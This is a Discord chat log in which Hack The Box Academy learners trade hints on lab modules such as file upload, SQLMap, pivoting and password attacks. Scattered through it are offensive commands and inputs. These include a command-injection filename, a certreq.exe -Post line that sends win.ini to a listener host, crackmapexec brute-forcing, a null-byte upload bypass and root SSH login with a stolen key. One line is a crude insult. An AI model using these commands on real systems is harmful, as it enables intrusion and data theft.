Hey all, did any solve the Password Attacks - Network Services questions? Particularly in finding the username and password for RDP? For some reason the provided username.list and password.list did not work with me in crackmapexec and hydra

DM me

aight

To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./

Web attacks - Bypassing Security Filters

Could anyone help with this?

@stuck hull where are u stuck

Hello all. I seek help and I don't know how to process.

Talking about the "Skills Assessment - File Upload Attacks"

I don't know how to read the source code. I intercepted the POST request (uploaded an *.jpg) with Burp first. After that I tried to upload a svg because I tried to read the source code of a specific file in order to figure out where the downloads directory is. I don't know how to do that. Can you give me some hints?

hint ||request method||

sure shoot me a dm

finally finished the pentest path after like months of procrastinating also thanks a lot to @candid zephyr and @pastel ginkgo (sorry for the ping) for helping me out on my last module

Nice, time for CPTS? 😄

Nice congrats!

I'm trying to finish most of it up before the end of the year.

not before offshore (just because there is a discount)

Nice I plan to tackle offshore too. I'm going to sneak in some quick obfuscation courses from THM over Christmas

i did get a bit sad when i found out john hammond isn't doing this for THM on Christmas any more

How is the attcking enterprise networks module? I hear the assessment is tough

oh no there is no assessment

the whole module is the assessment

oh

neat

Does anyone have a good explanation for what a reverse proxy is? I've looked it up several times and I still can't put 2 and 2 together.

Hey all, i have some trouble with nmap firewall IDS/IPS medium module. I tried with source port and many option

Did you try -D ?

think like how a NAT with port forwarding, except you have an entire box dedicated to just doing that with some potential waf, load-balancing, ect on the side.

I guess that makes sense

Yep, same issue. Impossible to get version

How many are you running ?

Try 5 and 10

try || 15, I had to use a high number for it to go through ||

Have you specified a specific source port?

I dont remember its been a couple months

I tried 15, 20. It doesn’t work.

Ok I have run exactly the same command and got the flag

🤔

i changed it, from get to post

Hi guys! Can someone help me on Print Operators section of the Windows Privilege Escalation module?

I don't quite seem to understand how to use UACMe to bypass UAC.

Edit: You don't actually need to worry about anything. Just input the credentials you're given to get a administrative shell and proceed as shown.

Hello. New here to the platfrom. I am about to start a new job thta will use Varonis and Nessus. Does HTB have training or labs on this?

i have completed every module on the SQL essentials except the last 2 of attack tuning. Ive done the final assesment and everything but cant figure out this one for #6, havent tried #7 yet cause waiting to figure out 6. but fr can anyone ehlp, ive tried the prefix hint but that didnt do much. need a hint

I remember having something about Nessus on the Vulnerability Assessment Module

SQLMap or SQL Injection?

sqlmap

like i was stuck on this one for wayyyy too long. just want to compelte it

Thanks...do you have a direct link to it? I am logged in, but not sure how to get to it

https://academy.hackthebox.com/module/details/108

Thx @graceful rampart

Half the module is about usung nessus

Its definetly not like a full nessus course or anything, but it will teach you the basucs

Thanks!

Anything on Varonis? Without having a lisc key, I am pretty much limtied to Youtube

The software seems really cool..guess I will learn all On the job

I dont believe so

You may be able to find something somewhere but idk

For number #6 you have to use the prefix like

sqlmap -u "www.example.com/?q=test" --prefix='`)'

Try to think as how the SQL query is being written and how you can manipulate it to do what you want to do

hello i have a quick question yall

I am just excited to get started on the tech stuff again. I have been an ISSM (boring) for the past 1.5 years, and now I will be a Sr. Security Engr

SOunds like i wil be managing the vuln programs

can my ip be pulled with a software like wireshark on discord vc? no, right?

AFAIK yes, it can. It isn't encrypted traffic so anyone in your network sniffing for network traffic can see your ip address, if someone is on the same network as you are they can also check your IP address through ARP table, or ping your mac address. There are a bunch of possibilities

testing now

thank you very much

yeah, just wanted to make sure. i join random servers and join vcs all the time so

was curious for my safety

im going to kms

i was doing ')' and not '`)'

Remember that being on the same network is different than being on the same server, i may be wrong but i don't think i can find your public ip address just by analyzing incoming discord traffic to my machine, because it isn't p2p.

The traffic comes from discord public ip address not yours

i know that but an ip grabber is an ip grabber

Is anyone having problems spawning the target VMs from the modules? The question provides the VM ip and Port but the VM/container isn't responding....

Nevermind. I respawned it 3 times, and waited a full 10 mins and pop the VM/container is responding. longest time I had to wait yet.

Your local IP will show on wireshark to people in your network.

People can't see random IPs in and out of Discord.

thanks

You see host > Discord > host traffic.

thanks man

Can I get a sanity check, on File Transfers living off the land, I am attempting to run this certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini and of course with my IP address. I have my NC listener on and when I run the command on the windows client I get a response back of (invalid argument: - POST)

Damn, anyone familiar with proxychains? Having trouble with it.

What's up?

Are you specifying the port of the NC? Try as

CertReq -Post -config example.org:port c:\windows\win.ini and show response in terminal

This would send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST

If you don't specify the port, it just assumes it's port 80 and if your nc isn't on port 80 the connection doesn't work

Trying to get proxychains up and running properly. I am on the Web Proxies module, section Proxying tools. Followed the steps in which I go to edit the /etc/proxychains.conf file, comment out the socks4 127.0.0.1 9050 and add http 127.0.0.1 and https 127.0.0.1 . I save the file and try to run proxychains with the curl command as such:

proxychains curl example.com

However, I get this output:
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| example.com
|D-chain|-<>-127.0.0.1:9050-<--timeout
|D-chain|-<>-127.0.0.1:8080-<--timeout

!!!need more proxies!!!
|DNS-response|: example.com does not exist
curl: (6) Could not resolve host: example.com

Tried following the geeksforgeeks tutorial online as well lol. Im missing some key point in how to settup proxies properly.

i was listening on port 80 and i just changed it to 8080 and still the same thing.

Weird, let me boot the machine and i'll try here just a sec

what's your proxychains.conf look like

thanks, reading the documentation on certreq i don't see anything on post

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1

@candid zephyr This is the proxy list section:

[ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

socks5 127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080

I have dynamic chaining uncommented alongside proxy_dns uncommented as well.

try just the socks5 proxy

also does the module tell you to systemctl start tor.service?

or is that not the point of this module (I haven't done it)

It does not say to do that. Just starts off with saying to comment the socks4 127.0.0.1 9050 out, then add http and https 127.0.0.1 8080

And to enable quit mode lol

ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| example.com
|D-chain|-<>-127.0.0.1:9050-<--timeout

!!!need more proxies!!!
|DNS-response|: example.com does not exist
curl: (6) Could not resolve host: example.com

D: Geez

@vital adder Did suggest this last night, https://discordapp.com/channels/473760315293696010/774040263278592041/1055278915704344626

oh yeah i forgot the protocol in that

I did try to experiment with use netcat to listen on those ports. Just to see what would happen, it caught the traffic. But timed out still lol

not sure how to would work but of course you will need a proxy server to route the proxy traffic

i don't really understand what it'd be doing without tor running or something else

you're just routing traffic into nothing. are you supposed to have burp open?

mrtom probably more use i've not done the module x)

I realize that now, sorry a bit uneducated in the matter! And yes your suppose to use burp with it. Was trying yesterday but hadnt managed to get it. Reading online on somethings, gonna try it again.

oh so for this without tor running on your localhost and port 9050 you are just basically routing the traffic to yourself but without something like proxy server to process stuff it will just time out because your machine don't know what to do with the traffic

also i'm not really sure about this but burp are supposed to be proxy (like proxychain) not a proxy server so not sure how you can use both

burp you'd use foxyproxy in your browser, not proxychains and curl.

The module just asks to use burp to see the traffic passing through proxychains I believe.

oh that kinda make sense

also with the magic of pivoting of course you can use both but i just not that practical (if not in AD)

The module doesn't even mention tor. Not sure where im fucking up at or if the module is missing that. Following this tutorial now: https://www.geeksforgeeks.org/how-to-setup-proxychains-in-linux-without-any-errors/

@vital adder For the Attacking common applications, attacking tomcat. How did you get any directory traversal? I cant get metasploit to work or any other shell other than the first they mention and I cant get anything more then simple ls commands

like ls /root wont work but ls -la will q.q

life is too short to route traffic through tor

you'll want to die

the routing will finished after you die

xD , well shit.

Have yall completed the Web proxies module?

nvm I got some directory traversal not to find the damn flag

for the metasploit method did you set the VHOST to ||web01.inlanefreight.local|| also if you use the cmd.jsp thing you should have full RCE

yeah it didnt work for me at all

oh wait nope the metasploit thing in my note was for brute forcing 🤣

same thing if I use their venom payload

it wont work

but for some reason in my note i make a elf payload and get a meterpreter shell from the RCE thing before i get the flag

just like the eternal blue one this only work like half of the time for me

lol I found the flag for the next section but I cant find it for this damn tomcat one

it drops me into the root directory and theres like 10 flags on this damn machine with different names xD

found the flag, it just wont read it x)

oh wait i just double check they did give you the flag name you can just use a find command with that name

question for some ppl in here: Are you all knocking out the modules and then doing some machines or are dabbling in both? Trying to grasp what is the optimal approach here. thank you!

I tried attacking the machines, failed miserably went back to acad to learn more

Mine is chaotic, dont do my method lol. I am just jumping around and doing the modules I can understand and knock out. Then I go to machine to view walkthroughs to understand how they do it. @elfin timber

yes #modules message

Im following the pathway, they build off each other but sometimes will reference modules that are far towards the end

like I hear the AD prive Esc module is handy for the AD module

Im using this to supplement my learning for OSCP. I felt that there was gaps of learning from the PWK that Im trying to fill with the modules. For example, at the end of the "Gettting Started" module there was a list of retired machines at the bottom of the page. Are you suppose to do those before moving on to other modules are is it discretionary?

I've only done a couple of modules as a refresher before I buy Offshore pro labs. I prefer the CTFs for learning but there's some subjects that are handy to just bosh through.

There's a list of "OSCP-esque" boxes for HTB.

yeah I have the TJ list

Some of the old ones are trash and not worth it though.

@vital adder Okay, so I am believing I am understanding the issue now. In the conf file for proxychains, the default proxy is: socks4 127.0.0.1 9050 which is the default(uses tors network). The module doesn't mention using tor and seems like yall are against it due to slowness. So you mustve used another proxyserver of your own(free ones online or create your own?) in order to get proxychains to work properly. I am starting to understand that ye, I don't have any actual servers to route the traffic through lol. But, I mean there must be a way to create a simple one on your own machine no? Curious how you did it.

if you read the oscp course syllabus and compare it to htb academy module they are 90% the same but htb stuff is just newer and better

yeah Ive gone through the PWK. Some ppl say everything you need to learn is in there and some say its a mile wide and a inch deep. Im more of the latter which is why I picked up Academy

https://free-proxy-list.net/ Thinking I need to use this.

if you want to try out proxychains tor will run just godly slow so if you just trying to ping or do a simple open port scan it won't take that long

@iron basin forgot network chuck have a video on this https://www.youtube.com/watch?v=qsA8zREbt6g

Ah yes, beard coffee hacker man

no that's a hacking pug

0.0

Side rant, anyone ever still use text emojis or know what they are lol?

do you mean the correct kind like 🙂 or that ugly 😄

oh god

haha lmao

it change it to the new version

"=)"

;D

ha take that

someone tell me how to setup the wifi of linux i connect the wifi but i cant`t serve the internet i install linux as a mian os

main os how to setup the internet

What linux OS did you use?

kali

kali linux

And you dont have access to the internet? But are able to connect to wifi?

yes!

ugh, I think I had this issue once. Lemme try to remember haha

i install all linux disto like kali parrot mint ubantu but wifi show and connet but i cant acces internet

what is your ip

are you pulling an appia?

did you set up for dhcp

i ping gooogle.com but not ping not give answer and send packets

real ip or local ip

private

https://superuser.com/questions/1724171/wifi-connected-but-internet-not-working-on-kali-linux-dual-boot

@meager topaz Maybe try this.

yes

yeah can you ping 8.8.8.8

i try all this solution but can`t solve this problem

if you can your online if you cant ping google.com its a dns issue

yeh i think

Can you see other computers on your network?

no my wifi work properly

Can you do traceroute google.com?

i not try

Can you run it and show the output of that?

okay bro

Well, maybe dm me the output, not sure if ya want to reveal any potentially sensitive IP info

that or hide ya real IP address before ya send it lol

meh, I'm still stuck with the Skills Assessment - File Upload Attacks module. I can't figure it out how to read the source code :/

bro i know i just kidding

Hi! I have a problem with a question in a module

I have to do JSON POST and there i have to use a cookie, but it says that I need a valid authentication cookie

anyone do the password mutation module recently

i need help with mysql part of password attacks module

kira

If someone is able to help me, I am stuck on Case# 5 on the SQLMAP Essentials module. I've got the flag, but it's not working.

a base application with nothing just the icon as an app

Hey! I'm trying to SSH into the machine on Password Attacks / Pass the Ticket (PtT) from Linux. I can't. Can someone tell me what I'm doing wrong? Does anyone else facing the same issue? (I tried both my own VM and Pwnbox)

Hi, I'm new, I'd like to learn hacking and I'm really looking forward to being the best of myself. I'm from Peru.

Read carefully the username that is given

what method are you trying

Hi I recommend the basic fundamentals courses to get a taste, unless you want to dive hard into a specific path :)

In the PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment, i dumped the lsass.dmp file on the windows box, but i don't know how to bring mimikatz on this machine to exploit the lsass file. I can transfer it to the Linux box but unable to upload it to its webeserver since i'm connected with sskey and not password (so unable to sudo). Any idea?

Was able to read the upload php file but I'm confused about bypassing the filters

by sskey do you mean rsa key?

if so you can absolutely transfer files with scp using a rsa key

yes i can transfer it to the linux box, but then i'm connected to the windows box throught the linux one by proxychains

yes rsa private key

you can proxychains scp too

oh ok thank you i'll try that

okay try uploading valid picture file with different filenames to see what filters are blocking you, then try uploading manipulated image files with valid filenames to see what will get past
Also: I can't remember if it was getting blocked, but I didn't use GIF8

Hey everyone. I'm currently on Active Directory Enumeration & Attacks - AD Enumeration & Attacks Skills Assessment Part 1 question 4. I went back to connect to a previous module which landed me on HOST MS01. I got domain admin on MS01 and the flag.txt is not located on the Adminstrator's desktop. Am I coming at this the right way? I would appreciate any help. I have been stuck for quite some time.

I fuzzed the files and phar should do it. I tried to add double extensions but that didn't work. For example shell.jpg.thar and shell.thar.jpg

Do I have to fuzz the content type for this challenge?

you won't need to alter that from the original
did you mean phar in your filenames?

1. minor nitpick but you dont have domain admin yet, thats a very special role.
2. File should be there, dunno why it isnt for you, id restart the box and log back in with the creds you found.

Ah okay so that safes time, nice. Uhm yeah I did run ffuf after uploading a normal jpg image. I got a few hits and one of them was thar. I think it's the right one but there were some others as well which I can't check right now.

okay you may have mistyped your wordlist or something, thar isn't a recognized executable, so that won't work. you can dm me if you need more help

I am making the module web requests

but I dont know why when I try to curl a file

I don't get a response

it just keeps thinking

I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection

but I can't curl the file

1 sec

Module: Web requests
Section: 219

when I try to curl a file I don't get a response, it just keeps thinking, I re-downloaded and connected the vpn, reset the target a couple of times and checked my internet connection
but I can't curl the file

(last one)
curl http://68.183.47.198:31307/download.php
curl: (28) Failed to connect to 68.183.47.198 port 31307: Expiró el tiempo de conexión

I also tried

curl 68.183.47.198:31307/download.php

like the example above shows

Akex06@htb[/htb]$ curl -O inlanefreight.com/index.html

"To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above. "

am I doing something wrong?

hmm

let me try

do people like the pwnbox?

I aint hating on it, I just said I don't like it

do I need to connect to the vpn on the pwnbox?

still the same issue

wget works?

It might

curl -O?

and curl -o for giving it a name

I just end up doing a > {filename}. type

im sure curl --help is more useful ¯_(ツ)_/¯

still the issue idk why

I searched up for "Web Requests htb" on youtube and the guy got the file with the same command I did

Are you able to connect to the actual url still?

Because that may be the main issue

hmm

no

Well there's your problem

:)

I reseted the target 2 times already and now you tell me to reset it and it works

ty still <3

Sometimes the modules are touchy

I had one where I put the command in correctly on my VM but it didn't output correctly/copy paste to pwnbox worked lol

Btw if you are in a situation where pwnbox works but yours doesn't try redownloading your vpn file and reconnecting

kk ill try it next time

is there a way of refunding a module?

I bought for 10 cubes the introduction to network module and I reaised that I already have learned that in school

like 2 weeks ago

I’m still getting use to the AD hacking terminology/lingo and incorrect with “domain admin” (was just assuming as I could read access Administrators directories). Thank you for pointing that out and making me aware. I have restarted the machine and still there is no flag.txt in Administrators. To further clarify I connected to #module:Active Directory Enumeration & Attacks #section:Credentialed Enumeration-from Windows for this as I was unable to evil-winrm into the machine on the #section:Skills Assesment Part | with the credentials from question 2 and 3.

Ah that wont work

While similar, the assessment environment is different than the section environment

you HAVE to do it from the assessment instance

i mean that means you should breeze through it. I have a CompTIA Net+ cert and I still am prob gonna take the htb networking or you can potentially submit any errors you find in #858470491676737536 with corrections ¯_(ツ)_/¯

@keen obsidian

the issue is not that I have bought the module, the issue is a read-only module, I wont get my cubes back :c

all of the 10 cube modules should refund you on completion

https://academy.hackthebox.com/module/details/34

Thank you for letting me know! 🙂 I am still a little lost of how to proceed for question 4. Again I have attempted to connect via evil-winrm with the credentials from question 2 and 3 but it won’t connect. I know evil-winrm port is opened as I performed an nmap scan on the box and found it to be opened. Am I right in proceeding this way? I would very much appreciate a hint/nudge as I am lost at this point.

@magic valve whats the url i'll help

Url as in the link to the module/section I am working on? Sorry if this is incorrect

it's at top of your web browser starting with www or https i got notes to help i think i just dont wanna search through hundreds of messages

@magic valve

what with it?

Basically telling you the same thing as others, completing the course gives you the cubes back

ahh i see it one sec

That’s what I thought u meant..just wanted to make sure. Lol. It’s https://academy.Hackthebox.com/module/143/section/1278

my notes are nonexistent for the part 1 assessment, but I would say there are more than one way to connect to it, dont be married to win-rm if that isnt working. Afterall win-rm only works if powershell remoting is enabled for that user.

oof unfortuantely i have not done that module i've done the ad basics though im 62% done with cpts so if you need help with other stuff in future i casn help

just send a dm i typically am on around 630-1130 est

No worries! I very much appreciate it!

no prob 🙂

and always take great notes a lot of people don't but its super important bc that way when you complete all the labs you can quickly go through the questions and have solutions handy. plous note taking and documentation is an important skill for pentesting ❤️

I always do. Thank you for the tip! 😃

fo sheezy neezy

To add onto taking notes: note down why specific tags/options are used, not just that you're using them

That makes sense! Thank you! I will attempt to put sharphound on the web shell to enumerate a little further of how I can connect to MS01

Why are you specifying -p on nc -lvnp port

yep taking good notes on ANYTHING you don't 100% know to do off the top of your head is super important. and can save you having to struggle again with entire course when reviewing for exam

Hello, can someone help me with this pivotoing assessment question ?

Very good point. This is something I haven’t been doing and will start to.

you'll def do port 3389

@kind vessel

so pivot/tunnel an nmap command and find the next device and then somehow gain access to rdp(i think)

Avoid spoiling answers here! Provide guidance on where they should be looking and what theyve already tried first

for sure my b

here there is a lab thats quite similar i think one sec i'll find @kind vessel

If they're using the right commands they'll reach the right port :)

check the lab and your notes for section web server pivoting with rdp

I find the ip i try to rdp from the first Windows host to the second but didn't work

Reread the sections

might need to do via pwnbox some of the labs on here only work with pwnbox unfortuantely tho im not sure about the one you're working on

Do you know which labs that aren't accessible by our own VMs or I'll figure it out when I get there

alkso rdp and socks tunneling section @kind vessel

i knopw on pivoting the second and third lab wouldn't work except on pwnbox @fathom pendant

module* not lab

section not module lol

really only pivoting module is the one i had trouble with almost all the others work on vm

i was trying that but my bad i don't run cmd as shell lol

crackmapexec winrm 10.129.193.3 -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt

So i'm running this right now. Anyone know how long this is going to take? It's still on username root. Been about 10 mins.

probably ages, cme is slow for bruting

Can I dm anyone about the attacking common applications - Os Module?

i think I got 2 and 2 together but im getting 3 and not 4 so I must be missing something

guys, do you know if exists some tool that let to have a pool of value copied? Just like having more CTRL-C saved

maybe is the wrong channel for this question

Any suggestions on what I should do? I'm on password attacks module. First question on Network Services

Dont remember that one too well, but Id probably check if hydra can do winrm.

or see if smb is available and hydra with that, as creds will be the same as for winrm most of the time

@thorn urchin Have you done the Attacking Common Applications Module yet?

Good evening, I have developed a project to recreate the netflix website with 2 weeks of front-end course, if you want to take a look and if you can give star on the project it will help a lot

https://github.com/carloseduardori/Projeto-Netflix

Ive slowed down a lot cause of RL obligations, I think im a couple sections behind you.

but im in the middle of that module, probably finish it by tomorrow night I expect

The OS support page one is killing me I understand how the exploit works it's just not working lol

¯_(ツ)_/¯

ill see when I get there lol

last one I did was jenkins, so whatever's after that is what Ill be doing tonight

Yeah Jenkins was cake and same for the one after that.

yeah the module has been actually dissapointingly easy so far. I had heard a lot of people saying it was super tough as the capstone to the web section if the course

but maybe thats just the last third lol

Hello everyone, I just complete the XSS module, but the Finish button (at the ending section) is not displayed, could someone please check and confirm that?

shouldn't take more than 5 min usually 1 or 2

it means you missed a section and forgot to hit mark as completed at the bottom. Go through your section list and see any that doesnt have the green checkmark

Been about 30 mins

nop, I did it for all sections and I submit the skills assessment flag but cant get it

I gurantee youre missing one

not a question, but an actual mark and continue

Screen shot the list of sections to the side

you have to do it for sections with no questions too btw

check ur dm please

Man I wish HTB had more hoodies with different colors.

Lets get some shit that pops

@languid fjord I'm sorry I should have asked before i dm'd you. I didn't read it until after i already sent the messages. My apologies.

pretty common. i think if you add those 4k hdmi plug ins. it lets you bypass the problem and can adjust it again. they are cheap too

@thorn urchin I found the a way in for the OS module... was stupid simple.

good to hear, dont spoil it for me yet lol

I swear I will spend 2 hours on the easy stuff and 15 mins on the hard

hey thats kinda the whole point behind triaging to improve that lol

can anyone help em with the pivoting skill assesment

dm if so ❤️

Do you think the following would be good for advancing pivoting knowledge for OSCP? https://academy.hackthebox.com/module/details/158 - Or would you guys recommend going for a prolab to learn that?

aint that the truth!

that module will teach you ALL you need to know

imo

its an awesome fun and singhtful module

insightful;*

I wish it went a little deeper into double pivots though but maybe im a masochist

mayyyybe lol

hellscrypt have u completed it?

yes

mind if i dm you?

it gets really really buggy towards the end of the module

sure

hey, someone could help me with the Skill Assessment - Broken Authentication module?

hacking crypto is doing the world a favour.

All the WOKE engineers agree

now i demand u to teach me

I dont care about the ethics of hacking crypto but this channel is about HTB academy, if youre not here to discuss that, get lost.

I hope you slip and get your dick caught in a meat grinder.

Hey have a question if I am in the Pentester job role path should I use the cpts help instead of modules help

for help with specific modules use the modules channel. For questions and discussions about the CPTS curriculum and exam , use the cpts channel 🙂

sorry forgot where I was lol

jerseys are sold out too in the size I want

ok was wondering if this is the same channel for questions in the modules of the Penteter job role path

I liked the jerseys.

yes this is the place

ok cool thank you

j

guys i'm in privilege escalation in getting started but i cant reach the root's flag.Someone can help me? I'm stuck :/

I got the user2 flag and I can see the path cat /root/.ssh/ with the
authorized_keys ,id_rsa and the id_rsa.pub

but I really don't know how to access to root privilege

I'm feeling dumb xD

Well. What can user2 do? How do we see what user 2 can do. To avoid spoilers in here DM; for hints keep asking

User 2 can do bash!But in my mind i think that we just can cat the id_rsa_pub and then logout and do root@IP -i [A VERY LONG ID_RSA.PUB]..but when i try to do this i have no response from server.Instead if i try to echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys i haven't the permission

thanks for helping btw

i try to chmod but permission denied

What can we do with their key

Since we can see that

Hint: module tells you

SO I learned that the private key is in our local machine and we use to log without password BUT (and that s a thing that idk if it's true) if we can add the rsa.pub on the authorized.key we can skip the password and got the privilege...but i can tfigure out how to do it :/

Well, if you can read someones private key, you dont need to add your own public key to authorized_keys you can just steal their key and log in with that

is that too spoilery? idk

I DID THAT BUT look

can t upload screenshot

If you can read a private key then im 100% sure that what you need to do was explained in the module

feel free to dm me

DM me or tux because you are super close to the answer

^

We can't say much more without it ending up in spoiler territory

need to verify youre account to upload screenshots

Ok so i m try to explain the problem. I have the key ok? but if i logout and copy and do root@ip -pPORT -i VERY LONG KEY i didn't have response from server.this is my problem

ah ok.How can i verify?

I think what i said is about as close to spoiler territory as you can get without just flat out giving away the answer

Well yeah, you're not going to get much with just the raw key

#welcome

why are you putting the full key in the command? save the key to a file and then use -i <file>

But as said, the module tells you explicitly what to do

tree connect failed: NT_STATUS_BAD_NETWORK_NAME

I'm trying to connect to smb

how can i find out the network name?

Yeah..that's the embarassing part.when i open vim i really don t know what to do .i copy paste the key ..press :q but vim tell me " No write since last change (add ! to override)" and then i try to exit and the only way is :q!

i have vim.

use sublime text

Cuz you dont have write privileges for the directory your in Read the error wrong 😅

:wq

Can i DM you?

Been working on this question for 4 hours lol

not right now. Sorry

de nada

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. can someone help me with this

I don't know how to start

thanks.

Load key "id_rsa": invalid format when i try to ssh root@etc. xD

How can i figure out the name of this share name.

I have the creds, but cant connect.

──(ruderaph㉿kali)-[~]
└─$ smbclient -N -L //10.129.202.136
session setup failed: NT_STATUS_ACCESS_DENIED

smbclient -L //<IP>/

DM me the exact error

Thank you

an early Christmas gift from the Academy team!

I DM you 🙂

Does anyone have silver annual membership?

@blissful verge 500 cubes for crackmapexec. I honestly never heard of it until I started the password attacks module. You think it's worth while to learn it in depth?

Dude... He's going to tell you yes lol

haha I know..

500 cubes is a lot though!

IDK ive been on silver. for the last year. I have the entire pentest unlocked, and 400 extra..

Well its one of the cornerstone king applications of windows AD pentesting right there with Responder and Bloodhound so yeah

@hazy grotto I was thinking about silver, but I'm 50 percent done on pentest path, and I'm not really interested in bug bounties.

The one on one help is interesting though.

I'm thinking of getting the annual to get the tutoring.

Just want to know hwo the response time is.

yeah, same.

Wait I have silver and there is tutoring how do I getnthis

I have silver membership

its a tool I use on every pentest, so yes it is worth learning it well. I have been using the tool since it first came out and I learned a bunch of new tricks doing QA on it. also, its written by one of the tool authors mpgn so there's a ton of info in it

hi, you finish sill assessment 2 no sqli?

I’m hoping for more macOS content🤞🏻🤞🏻

for skill assesment i'm trying to upload mimikatz to windows machine however i can't figure out how. smb, http server, nothing works. i have a meterpreter session.

i think i need to port forward but what i'm trying isnt working

Hello there hope you guys are well!

Anyone seen this error before with hydra? Trying to brute force ssh in the network services section of the password attacks module

maybe reset machine not sure tho

Out of memory it forgor

Tried that already

lmao

bro what?????

It has to be annual silver.. 490 bucks

What even is this excersize. Why have it if half of it dosent work 😭

I just completed that section

Am i doing something wrong?

did anyone did the machine three in the learn the basics section ?

Try removing the last two flags

Wait

-vv just makes it show me every attempt and -I is to skip the 10 second wait when it tries to restore the last session

but the module give back 0 cubes?

im going to dm you

They shouldnt effect how it runs

I was looking at the wrong one. I ran a few different ones

please do

Alright, if anyone needs help with this one, I found a workaround. The machine is still broken but I found a way to get all the logins

(Its most definetly not inteded tho, and if ti is then whoever designed this module needs a kick in the head)

I'm very lost on the live engagement section of the payloads & shells module. I know what to do but I think I'm not understanding a network detail here because I cannot access any of the targets.

You have to rdp into the foothold machine they provide and do everything from there

I have, but theres no internet application?

How can I access the webserver?

run firefox from the commandline

I had the same issue

Bruh. Okay did not know that was a thing, thank you.

idk why tf theres no shortcut for it

I spent like 30 minutes trying to figure out what i was supposed to do

I'm also unable to ssh using root. It constantly times out too

@vital adder For the Attacking Common Apps Skills Assessment 1, I can see the flag but I can't read it. I also cant get a reverse shell with metasploit, powershell or any other way. Any ideas? im so close lol

Password attacks Kira username to get mysql

Any hint?

powershell isn't installed 🤣 and for if you wan to get a rev shell there should be a python script on github for this vuln but if you just want to get the flag you should be able to just copy it in your current directory and you can use metasploit ||ghost cat|| to read the flag

oo ghost cat is a good idea

i just got it in there and tried directly going to it and got an error lol

HAZAH i got it

fuck me

I'll go get the lube

I'm stuck on the second question for Privilege Escalation. So basically my understanding is the private SSH key for this root account is viewable by anyone because it was improperly secured with chmod 644 instead of chmod 600. This misconfiguration allows you as the attacker to copy the root's ssh key to a file on user2's account, name it id_rsa, set the permissions to chmod 600, then ssh into root account using 'ssh root@<ip> -p<port> -i id_rsa' . However, when I do this, the ssh command just hangs and times out. I've tried resetting the vm and the HTB attack box; I've tired using my on vm, I checked the discord server and found several people had the same issue but it's still not working for me. The only other thing I can think of is to change the ownership of the id_rsa file from user2 to root but i was unsuccessful with this because it asked me for user2's password.

send me a dm with a screenshot of the error.

Thanks again for helping me fix this issue. Its working now and I will never forget this lesson! So I made two mistakes: 1) I tried to ssh into the root account from an existing user1 ssh session; and 2) I had some space to the right of the last character (-) of the private SSH key, which resulted in the ssh root command prompting me for the password inspite of the fact that I supplied it with the id_rsa file. 👍🏻

👍 😎 🎉

lessons learned :D

also nfs is super simple compared to smb LOL i guess because we stay in linux

Good morning. Could anyone help me bypassing the upload filter in the skill assessment center in the upload module?

anyone finished "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them" from "Introduction to Windows Command Line"

DM me.

DM me.

Password Mutations: i get always the message: Please specify the hash-mode with -m [hash-mode].

.\hashcat .\Password-Attacks\password.list -r .\Password-Attacks\custom.rule

@everyone any of you know about cybersecurity Saas apps if yes can you pls tell me what these companies and apps are not providing

Have you managed to get the flag for this one?

yes

Did you find it harder than when we had to look for the Waldo.txt file earlier on?

try hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

Where did you find the command for this?

i missed --stdout, thx

@ripe badge bot commands do not belong here. Reason why we have #bot-commands for a reason

someone can tell me best and free portforwading for msf

@meager topaz what

port forwading

free port forwading in kali linux without router or real ip

imagine thinking this chat is going to be useful for something like that :^)

yes

This might be a stupid question but let's assume I'm able to upload a php file with burp. The extension to bypass the filter is .php\x00.jpg. how on earth do I access this file in the browser?

Hello guys, can someone help me on Enumeration with NMAP Module ?

@meager topaz do u think that is possible 🤔

Password mutation
User : Kira
MySql
Howw

Hello everyone....

I am newbies in here. Just looking around here and try to learn something but don't understand what you all chatting.😁

what does it mean?

Hello i'm on pivot assessment i find the second user || i find known_hosts in the first windows machine || but i dont know how to exploit it can someone help me ?

so you are on the first machine? and if you found the user cred for the second machine you can just pivot and rdp in

Does someone have the NMAP Module ?

sure what's the issue?

Can i dm you

sure

https://www.youtube.com/watch?v=53zkBvL4ZB4
also hint ||mutate the|| given cred

As someone that works in IT I am 100% sharing this with my colleagues in our work chat tomorrow LOL

here also share this https://dontasktoask.com/

I Work helpdesk at a callcenter but it bothers me so much when people are asking the "why does this break" and it's like "I don't know, i wasn't running windbg when your system crashed"

yea it does get annoying when people are asking stupid question like that or "how to hack"

how to hack; step 1; get compyuta step 2; google

Hi! I think i have found a mistake in a module!

#858470491676737536

which section and wtf what happened to your font?

so for that do some research on the WordPress xmlrpc attacks like the question said and if you found some exploit code you can send it with curl like in the example

also a tip for this section is when you got the right output throw it in some thing like sublime text and look for the strings: <string> and the number of matched should be the answer

I wrote the problem there, thanks!

can someone help me with this

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

@keen obsidian ask better questions but also reread the module, it tells you how to get the info you're looking for

good one

But in reality what is the actual thing you are having issues with? Otherwise you're not really gonna get assistance, just sassistance

Password Attacks / Pass the Ticket (PtT) from Linux, Q5. The python KeyTabExtract script only gave me the AES-256 hash and not the NTLM. How will I crack this hash? And/Or how can I use Rubeus (on the Linux machine that I have access)?

(screenshot of the results:)

there's something weird about that module, idk man.

sometimes the tickets update, sometimes they don't. I just got lucky

i eventually stopped doing academy. saving up money for OSCP instead

hopefully you've been taking notes as well, because "Kira" comes back later

if you didn't save her password, you're in trouble

that was the last straw. it's my own fault for not keeping notes, but still...

